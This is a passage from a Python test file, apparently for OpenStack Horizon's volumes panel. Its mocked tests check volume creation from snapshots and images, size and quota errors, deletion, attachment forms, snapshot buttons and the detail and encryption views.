filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_type_default.assert_called_once()
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_tenant_quota_usages.assert_called_once()
self.mock_volume_snapshot_get.assert_called_once_with(
test.IsHttpRequest(), str(snapshot.id))
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=snapshot.id,
group_id=None, image_id=None, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['volume_snapshot_get',
'volume_type_list',
'volume_type_default',
'volume_get',
'group_list'],
})
def test_create_volume_from_snapshot_invalid_size(self):
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 20, 'snapshot_source': snapshot.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_get.return_value = snapshot
self.mock_volume_get.return_value = self.cinder_volumes.first()
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"snapshot_id=" + str(snapshot.id)]),
formData, follow=True)
self.assertEqual(res.redirect_chain, [])
self.assertFormError(res, 'form', None,
"The volume size cannot be less than the "
"snapshot size (40GiB)")
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.mock_volume_snapshot_get.assert_called_with(test.IsHttpRequest(),
str(snapshot.id))
self.mock_volume_get.assert_called_with(test.IsHttpRequest(),
snapshot.volume_id)
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_get'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_type_default',
'volume_type_list',
'volume_create',
'group_list'],
})
def test_create_volume_from_image(self):
volume = self.cinder_volumes.first()
image = self.images.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 40,
'type': '',
'image_source': image.id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_type_list.ret = self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_image_get.return_value = image
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
self.mock_volume_create.return_value = volume
# get image from url
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"image_id=" + str(image.id)]),
formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_tenant_quota_usages.assert_called_once()
self.mock_image_get.assert_called_once_with(test.IsHttpRequest(),
str(image.id))
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=None,
group_id=None, image_id=image.id, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed',
'image_get'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_snapshot_list',
'volume_list',
'volume_type_list',
'volume_type_default',
'volume_create',
'group_list'],
})
def test_create_volume_from_image_dropdown(self):
volume = self.cinder_volumes.first()
image = self.images.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 30,
'type': '',
'volume_source_type': 'image_source',
'snapshot_source': self.cinder_volume_snapshots.first().id,
'image_source': image.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_image_get.return_value = image
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
self.mock_volume_create.return_value = volume
# get image from dropdown list
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_type_default.assert_called_once()
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_tenant_quota_usages.assert_called_once()
self.mock_image_get.assert_called_with(test.IsHttpRequest(),
str(image.id))
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=None,
group_id=None, image_id=image.id, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_get'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_type_list',
'volume_type_default',
'group_list'],
})
def test_create_volume_from_image_under_image_size(self):
image = self.images.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 1, 'image_source': image.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_image_get.return_value = image
self.mock_extension_supported.return_value = True
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"image_id=" + str(image.id)]),
formData, follow=True)
self.assertEqual(res.redirect_chain, [])
msg = ("The volume size cannot be less than the "
"image size (20.0\xa0GB)")
self.assertFormError(res, 'form', None, msg)
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.assertEqual(2, self.mock_tenant_quota_usages.call_count)
self.mock_image_get.assert_called_with(test.IsHttpRequest(),
str(image.id))
self.mock_extension_supported.assert_called_with(test.IsHttpRequest(),
'AvailabilityZones')
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_get'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_type_list',
'volume_type_default',
'group_list'],
})
def _test_create_volume_from_image_under_image_min_disk_size(self, image):
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 5, 'image_source': image.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_image_get.return_value = image
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"image_id=" + str(image.id)]),
formData, follow=True)
self.assertEqual(res.redirect_chain, [])
self.assertFormError(res, 'form', None,
"The volume size cannot be less than the "
"image minimum disk size (30GiB)")
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.assertEqual(2, self.mock_availability_zone_list.call_count)
self.mock_image_get.assert_called_with(test.IsHttpRequest(),
str(image.id))
self.mock_extension_supported.assert_called_with(test.IsHttpRequest(),
'AvailabilityZones')
self.mock_group_list.assert_called_with(test.IsHttpRequest())
def test_create_volume_from_image_under_image_min_disk_size(self):
image = self.images.get(name="protected_images")
image.min_disk = 30
self._test_create_volume_from_image_under_image_min_disk_size(image)
def test_create_volume_from_image_under_image_prop_min_disk_size_v2(self):
image = self.imagesV2.get(name="protected_images")
self._test_create_volume_from_image_under_image_min_disk_size(image)
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_list',
'volume_type_list',
'volume_type_default',
'volume_snapshot_list',
'group_list'],
})
def test_create_volume_gb_used_over_alloted_quota(self):
formData = {'name': 'This Volume Is Huge!',
'description': 'This is a volume that is just too big!',
'method': 'CreateForm',
'size': 5000}
usage_limit = self.cinder_quota_usages.first()
usage_limit.add_quota(api.base.Quota('volumes', 6))
usage_limit.tally('volumes', len(self.cinder_volumes.list()))
usage_limit.add_quota(api.base.Quota('gigabytes', 100))
usage_limit.tally('gigabytes', 80)
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = usage_limit
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
expected_error = ['A volume of 5000GiB cannot be created as you only'
' have 20GiB of your quota available.']
self.assertEqual(res.context['form'].errors['__all__'], expected_error)
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.assertEqual(2, self.mock_volume_list.call_count)
self.assertEqual(2, self.mock_availability_zone_list.call_count)
self.assertEqual(2, self.mock_tenant_quota_usages.call_count)
self.mock_volume_snapshot_list.assert_called_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_extension_supported.assert_called_with(test.IsHttpRequest(),
'AvailabilityZones')
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_list',
'volume_type_list',
'volume_type_default',
'volume_snapshot_list',
'group_list'],
})
def test_create_volume_number_over_alloted_quota(self):
formData = {'name': 'Too Many...',
'description': 'We have no volumes left!',
'method': 'CreateForm',
'size': 10}
usage_limit = self.cinder_quota_usages.first()
usage_limit.add_quota(api.base.Quota('volumes',
len(self.cinder_volumes.list())))
usage_limit.tally('volumes', len(self.cinder_volumes.list()))
usage_limit.add_quota(api.base.Quota('gigabytes', 100))
usage_limit.tally('gigabytes', 20)
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = usage_limit
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
expected_error = ['You are already using all of your available'
' volumes.']
self.assertEqual(res.context['form'].errors['__all__'], expected_error)
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.assertEqual(2, self.mock_availability_zone_list.call_count)
self.mock_volume_snapshot_list.assert_called_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_list.assert_called_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_extension_supported.assert_called_with(test.IsHttpRequest(),
'AvailabilityZones')
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
cinder: ['volume_create', 'volume_snapshot_list',
'volume_type_list', 'volume_type_default',
'volume_list', 'availability_zone_list',
'extension_supported', 'group_list'],
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
})
def test_create_volume_with_group(self):
volume = self.cinder_volumes.first()
volume_type = self.cinder_volume_types.first()
az = self.cinder_availability_zones.first().zoneName
volume_group = self.cinder_groups.list()[0]
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'type': volume_type.name,
'size': 50,
'snapshot_source': '',
'availability_zone': az,
'group': volume_group.id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [[], False, False]
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_extension_supported.return_value = True
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = self.cinder_groups.list()
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_availability_zone_list.assert_called_once()
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], formData['type'], metadata={},
snapshot_id=None, group_id=volume_group.id, image_id=None,
availability_zone=formData['availability_zone'], source_volid=None)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_tenant_quota_usages.assert_called_once_with(
test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_delete',
'volume_snapshot_list',
'volume_list_paged',
'tenant_absolute_limits'],
})
def test_delete_volume(self):
volumes = self.cinder_volumes.list()
volume = self.cinder_volumes.first()
formData = {'action':
'volumes__delete__%s' % volume.id}
self.mock_volume_list_paged.return_value = [volumes, False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_volume_list_paged.return_value = [volumes, False, False]
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
url = INDEX_URL
res = self.client.post(url, formData, follow=True)
self.assertIn("Scheduled deletion of Volume: Volume name",
[m.message for m in res.context['messages']])
self.mock_volume_list_paged.assert_called_with(
test.IsHttpRequest(), marker=None,
paginate=True, sort_dir='desc',
search_opts=None)
self.assertEqual(2, self.mock_volume_snapshot_list.call_count)
self.mock_volume_delete.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_server_list.assert_called_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(8, self.mock_tenant_absolute_limits.call_count)
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_delete_volume_with_snap_no_action_item(self, mock_get,
mock_limits,
mock_quotas):
volume = self.cinder_volumes.get(name='Volume name')
setattr(volume, 'has_snapshot', True)
limits = self.cinder_limits['absolute']
mock_get.return_value = volume
mock_limits.return_value = limits
mock_quotas.return_value = self.cinder_quota_usages.first()
url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(url, {}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(res.status_code, 200)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
self.assertNotContains(res, 'Delete Volume')
self.assertNotContains(res, 'delete')
@mock.patch.object(api.nova, 'server_list')
@mock.patch.object(cinder, 'volume_get')
@override_settings(OPENSTACK_HYPERVISOR_FEATURES={'can_set_mount_point':
True})
def test_edit_attachments(self, mock_get, mock_server_list):
volume = self.cinder_volumes.first()
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
volume.attachments = [{'id': volume.id,
'volume_id': volume.id,
'volume_name': volume.name,
"attachment_id": ATTACHMENT_ID,
'instance': servers[0],
'device': '/dev/vdb',
'server_id': servers[0].id}]
mock_get.return_value = volume
mock_server_list.return_value = [servers, False]
url = reverse('horizon:project:volumes:attach',
args=[volume.id])
res = self.client.get(url)
msg = 'Volume %s on instance %s' % (volume.name, servers[0].name)
self.assertContains(res, msg)
# Asserting length of 2 accounts for the one instance option,
# and the one 'Choose Instance' option.
form = res.context['form']
self.assertEqual(len(form.fields['instance']._choices),
1)
self.assertEqual(res.status_code, 200)
self.assertIsInstance(form.fields['device'].widget,
widgets.TextInput)
self.assertFalse(form.fields['device'].required)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_server_list.assert_called_once()
@mock.patch.object(api.nova, 'server_list')
@mock.patch.object(cinder, 'volume_get')
@override_settings(OPENSTACK_HYPERVISOR_FEATURES={'can_set_mount_point':
True})
def test_edit_attachments_auto_device_name(self, mock_get,
mock_server_list):
volume = self.cinder_volumes.first()
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
volume.attachments = [{'id': volume.id,
'volume_id': volume.id,
'volume_name': volume.name,
"attachment_id": ATTACHMENT_ID,
'instance': servers[0],
'device': '',
'server_id': servers[0].id}]
mock_get.return_value = volume
mock_server_list.return_value = [servers, False]
url = reverse('horizon:project:volumes:attach',
args=[volume.id])
res = self.client.get(url)
form = res.context['form']
self.assertIsInstance(form.fields['device'].widget,
widgets.TextInput)
self.assertFalse(form.fields['device'].required)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_server_list.assert_called_once()
@mock.patch.object(api.nova, 'server_list')
@mock.patch.object(cinder, 'volume_get')
def test_edit_attachments_cannot_set_mount_point(self, mock_get,
mock_server_list):
volume = self.cinder_volumes.first()
url = reverse('horizon:project:volumes:attach',
args=[volume.id])
res = self.client.get(url)
# Assert the device field is hidden.
form = res.context['form']
self.assertIsInstance(form.fields['device'].widget,
widgets.HiddenInput)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_server_list.assert_called_once()
@mock.patch.object(api.nova, 'server_list')
@mock.patch.object(cinder, 'volume_get')
def test_edit_attachments_attached_volume(self, mock_get,
mock_server_list):
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
server = servers[0]
volume = self.cinder_volumes.list()[0]
mock_get.return_value = volume
mock_server_list.return_value = [servers, False]
url = reverse('horizon:project:volumes:attach',
args=[volume.id])
res = self.client.get(url)
self.assertEqual(res.context['form'].fields['instance']._choices[0][1],
"Select an instance")
self.assertEqual(len(res.context['form'].fields['instance'].choices),
2)
self.assertEqual(res.context['form'].fields['instance']._choices[1][0],
server.id)
self.assertEqual(res.status_code, 200)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_server_list.assert_called_once()
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_create_snapshot_button_attributes(self, mock_get,
mock_limits,
mock_quotas):
limits = {'maxTotalSnapshots': 2}
limits['totalSnapshotsUsed'] = 1
volume = self.cinder_volumes.first()
mock_get.return_value = volume
mock_limits.return_value = limits
mock_quotas.return_value = self.cinder_quota_usages.first()
res_url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(res_url, {},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
action_name = ('%(table)s__row_%(id)s__action_%(action)s' %
{'table': 'volumes', 'id': volume.id,
'action': 'snapshots'})
content = res.content.decode('utf-8')
self.assertIn(action_name, content)
self.assertIn('Create Snapshot', content)
self.assertIn(reverse('horizon:project:volumes:create_snapshot',
args=[volume.id]),
content)
self.assertNotIn('disabled', content)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_create_snapshot_button_disabled_when_quota_exceeded(
self, mock_get, mock_limits, mock_quotas):
limits = {'maxTotalSnapshots': 1}
limits['totalSnapshotsUsed'] = limits['maxTotalSnapshots']
volume = self.cinder_volumes.first()
mock_get.return_value = volume
mock_limits.return_value = limits
mock_quotas.return_value = self.cinder_quota_usages.first()
res_url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(res_url, {},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
action_name = ('%(table)s__row_%(id)s__action_%(action)s' %
{'table': 'volumes', 'id': volume.id,
'action': 'snapshots'})
content = res.content.decode('utf-8')
self.assertIn(action_name, content)
self.assertIn('Create Snapshot (Quota exceeded)', content)
self.assertIn(reverse('horizon:project:volumes:create_snapshot',
args=[volume.id]),
content)
self.assertIn('disabled', content,
'The create snapshot button should be disabled')
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_snapshot_list',
'volume_list_paged',
'tenant_absolute_limits'],
})
def test_create_button_attributes(self):
limits = self.cinder_limits['absolute']
limits['maxTotalVolumes'] = 10
limits['totalVolumesUsed'] = 1
volumes = self.cinder_volumes.list()
self.mock_volume_backup_supported.return_value = True
self.mock_volume_list_paged.return_value = [volumes, False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'horizon/common/_data_table_view.html')
volumes = res.context['volumes_table'].data
self.assertCountEqual(volumes, self.cinder_volumes.list())
create_action = self.getAndAssertTableAction(res, 'volumes', 'create')
self.assertEqual(set(['ajax-modal', 'ajax-update', 'btn-create']),
set(create_action.classes))
self.assertEqual('Create Volume', create_action.verbose_name)
self.assertEqual('horizon:project:volumes:create', create_action.url)
self.assertEqual((('volume', 'volume:create'),),
create_action.policy_rules)
self.assertEqual(5, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), sort_dir='desc', marker=None,
paginate=True, search_opts=None)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(9, self.mock_tenant_absolute_limits.call_count)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_snapshot_list',
'volume_list_paged',
'tenant_absolute_limits'],
})
def test_create_button_disabled_when_quota_exceeded(self):
limits = self.cinder_limits['absolute']
limits['totalVolumesUsed'] = limits['maxTotalVolumes']
volumes = self.cinder_volumes.list()
self.mock_volume_backup_supported.return_value = True
self.mock_volume_list_paged.return_value = [volumes, False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'horizon/common/_data_table_view.html')
volumes = res.context['volumes_table'].data
self.assertCountEqual(volumes, self.cinder_volumes.list())
create_action = self.getAndAssertTableAction(res, 'volumes', 'create')
self.assertIn('disabled', create_action.classes,
'The create button should be disabled')
self.assertEqual(5, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
paginate=True, sort_dir='desc',
search_opts=None)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(9, self.mock_tenant_absolute_limits.call_count)
@test.create_mocks({
api.nova: ['server_get'],
cinder: ['volume_snapshot_list',
'volume_get',
'tenant_absolute_limits'],
})
def test_detail_view(self):
volume = self.cinder_volumes.first()
server = self.servers.first()
snapshots = self.cinder_volume_snapshots.list()
volume.attachments = [{"server_id": server.id,
"attachment_id": ATTACHMENT_ID}]
self.mock_volume_get.return_value = volume
self.mock_volume_snapshot_list.return_value = snapshots
self.mock_server_get.return_value = server
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
url = reverse('horizon:project:volumes:detail',
args=[volume.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'horizon/common/_detail.html')
self.assertEqual(res.context['volume'].id, volume.id)
self.assertNoMessages()
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts={'volume_id': volume.id})
self.mock_server_get.assert_called_once_with(test.IsHttpRequest(),
server.id)
self.mock_tenant_absolute_limits.assert_called_once()
@mock.patch.object(cinder, 'volume_get_encryption_metadata')
@mock.patch.object(cinder, 'volume_get')
def test_encryption_detail_view_encrypted(self, mock_get, mock_encryption):
enc_meta = self.cinder_volume_encryption.first()
volume = self.cinder_volumes.get(name='my_volume2')
mock_encryption.return_value = enc_meta
mock_get.return_value = volume
url = reverse('horizon:project:volumes:encryption_detail',
args=[volume.id])
res = self.client.get(url)
self.assertContains(res,
"Volume Encryption Details: %s" % volume.name,
2, 200)
self.assertContains(res, "<dd>%s</dd>" % volume.volume_type, 1, 200)
self.assertContains(res, "<dd>%s</dd>" % enc_meta.provider, 1, 200)
self.assertContains(res, "<dd>%s</dd>" % enc_meta.control_location, 1,
200)
self.assertContains(res, "<dd>%s</dd>" % enc_meta.cipher, 1, 200)
self.assertContains(res, "<dd>%s</dd>" % enc_meta.key_size, 1, 200)
self.assertNoMessages()
mock_encryption.assert_called_once_with(test.IsHttpRequest(),
volume.id)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
@mock.patch.object(cinder, 'volume_get_encryption_metadata')
@mock.patch.object(cinder, 'volume_get')
def test_encryption_detail_view_unencrypted(self, mock_get,
mock_encryption):
enc_meta = self.cinder_volume_encryption.list()[1]
volume = self.cinder_volumes.get(name='my_volume2')
mock_encryption.return_value = enc_meta
mock_get.return_value = volume
url = reverse('horizon:project:volumes:encryption_detail',
args=[volume.id])
res = self.client.get(url)
self.assertContains(res,
"Volume Encryption Details: %s" % volume.name,
2, 200)
self.assertContains(res, "<h3>Volume is Unencrypted</h3>", 1, 200)
self.assertNoMessages()
mock_encryption.assert_called_once_with(test.IsHttpRequest(),
volume.id)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_get_data(self, mock_get, mock_limits, mock_quotas):
volume = self.cinder_volumes.get(name='v2_volume')
volume._apiresource.name = ""
mock_get.return_value = volume
mock_limits.return_value = self.cinder_limits['absolute']
mock_quotas.return_value = self.cinder_quota_usages.first()
url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(url, {},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(res.status_code, 200)
self.assertEqual(volume.name, volume.id)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({
api.nova: ['server_get'],
cinder: ['tenant_absolute_limits',
'volume_get',
'volume_snapshot_list'],
})
def test_detail_view_snapshot_tab(self):
volume = self.cinder_volumes.first()
server = self.servers.first()
snapshots = self.cinder_volume_snapshots.list()
this_volume_snapshots = [snapshot for snapshot in snapshots
if snapshot.volume_id == volume.id]
volume.attachments = [{"server_id": server.id,
"attachment_id": ATTACHMENT_ID}]
self.mock_volume_get.return_value = volume
self.mock_server_get.return_value = server
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
self.mock_volume_snapshot_list.return_value = this_volume_snapshots
url = '?'.join([reverse(DETAIL_URL, args=[volume.id]),
'='.join(['tab', 'volume_details__snapshots_tab'])])
res = self.client.get(url)
